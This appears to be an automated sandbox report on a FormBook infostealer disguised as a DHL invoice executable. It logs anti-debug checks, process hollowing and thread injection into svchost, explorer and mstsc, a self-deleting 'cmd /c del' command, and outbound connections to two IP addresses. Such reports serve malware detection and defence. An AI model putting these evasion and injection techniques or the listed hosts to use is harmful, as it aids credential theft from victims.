Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04A80 mov eax, dword ptr fs:[00000030h]	3_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68A90 mov edx, dword ptr fs:[00000030h]	3_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	3_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	3_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86AA4 mov eax, dword ptr fs:[00000030h]	3_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]	3_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]	3_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEA60 mov eax, dword ptr fs:[00000030h]	3_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]	3_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]	3_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBCA11 mov eax, dword ptr fs:[00000030h]	3_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA24 mov eax, dword ptr fs:[00000030h]	3_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EA2E mov eax, dword ptr fs:[00000030h]	3_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]	3_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]	3_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA38 mov eax, dword ptr fs:[00000030h]	3_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC69C0 mov eax, dword ptr fs:[00000030h]	3_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C649D0 mov eax, dword ptr fs:[00000030h]	3_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]	3_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]	3_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]	3_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]	3_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]	3_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]	3_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov esi, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0946 mov eax, dword ptr fs:[00000030h]	3_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04940 mov eax, dword ptr fs:[00000030h]	3_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov edx, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]	3_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]	3_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC97C mov eax, dword ptr fs:[00000030h]	3_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]	3_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]	3_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC912 mov eax, dword ptr fs:[00000030h]	3_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]	3_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]	3_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB892A mov eax, dword ptr fs:[00000030h]	3_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC892B mov eax, dword ptr fs:[00000030h]	3_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]	3_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D008C0 mov eax, dword ptr fs:[00000030h]	3_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]	3_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	3_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	3_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30887 mov eax, dword ptr fs:[00000030h]	3_2_03C30887

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00460B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00460B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00432622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00432622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0042083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042083F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004209D5 SetUnhandledExceptionFilter,	0_2_004209D5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00420C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00420C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00652622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00652622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0064083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0064083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006409D5 SetUnhandledExceptionFilter,	2_2_006409D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00640C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00640C21

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.184.95 80

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 6296	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4084	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe	Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 530000			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 910000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 3012008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 3166008			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_00461201

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00442BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00442BA5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0046B226 SendInput,keybd_event,

0_2_0046B226

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_004822DA

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_00460B62

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00461663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00461663

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.1431920314.0000000003791000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, name.exe, svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.1454178466.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1453898977.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2339985971.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.1454178466.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000015.00000002.2667973410.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0Progman
Source: svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2667304367.0000000000530000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
Source: explorer.exe, 00000004.00000000.1454178466.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.1457725429.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00420698 cpuid

0_2_00420698

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00478195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00478195

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0045D27A GetUserNameW,

0_2_0045D27A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0043B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0043B952

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004042DE

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe, 00000009.00000002.1590364793.00000000006E2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
